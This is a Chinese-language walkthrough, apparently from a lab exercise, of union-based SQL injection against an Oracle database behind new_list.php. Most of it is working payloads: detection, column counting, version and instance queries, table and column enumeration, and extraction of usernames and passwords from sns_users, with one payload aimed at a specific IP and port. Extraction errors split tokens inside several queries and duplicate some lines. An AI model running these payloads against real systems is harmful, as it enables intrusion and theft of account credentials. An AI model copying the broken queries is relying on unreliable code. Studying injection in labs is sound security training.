1)跟其他数据库⼀样,检测注⼊点都是可以通过拼接and语句进⾏判断。这⾥通过and 1=1 和and 1=2进⾏判断。
#payload new_list.php
?id=1 and 1=1 new_list.php
?id=1 and 1=2
(2)通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断 当前字段数为2
new_list.php?id=1 order by 2
new_list.php?id=1 order by 3
(3)获取显错点,联合查询这⾥使⽤了union select,oracle数据库与mysql数据库不同点在于它对 于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段 new_list.php?id=1 order by 2 new_list.php?id=1 order by 3 1 2 Python 48 使⽤字符型数据,整型字段使⽤整型数据才可以。如下,两个字段都为字符型,故使⽤ union selec t ‘null’,‘null’ 。 (在有些情况下也采⽤union all select的形式进⾏联合查询。union all select与union select的不同 点可以很容易理解为all表示输出所有,也就是当数据出现相同时,将所有数据都输出;union select则会将相同数据进⾏过滤,只输出其中⼀条。)
#联合查询
new_list.php?id=-1 union select null,null from dual //dual为伪表
#修改null为'null',判断字段类型均为字符型new_list.php?id=-1 union select 'null','null' from dual
(4)查询数据库版本信息.
http://124.70.22.208:42980/new_list.php?id=-1 union select 'null',(select b anner from sys.v_$version where rownum=1) from dual
(5)查询当前数据库库名..
new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANC E) from dual
(6)查询数据库表名,查询表名⼀般查询admin或者user表
#获取第⼀个表名
LOGMNR_SESSION_EVOLVE$ new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
#获取第⼆个表名
LOGMNR_GLOBAL$ new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
#获取第三个表名
LOGMNR_GT_TAB_INCLUDE$ new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_nam e not in 'LOGMNR_GLOBAL$') from dual
#模糊搜索查询.获取sns_users表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
(7)查询数据库列名...
#直接查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1) from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual
#模糊搜索查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1 and column_name like '%USE R%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1 and column_name like '%USE R%' and column_name <> 'USER_NAME') from dual
(8)查询数据库数据获取账号密码的字段内容...
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong'
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
(9)对其数据库内的字段内容进⾏解密....进⾏后台登录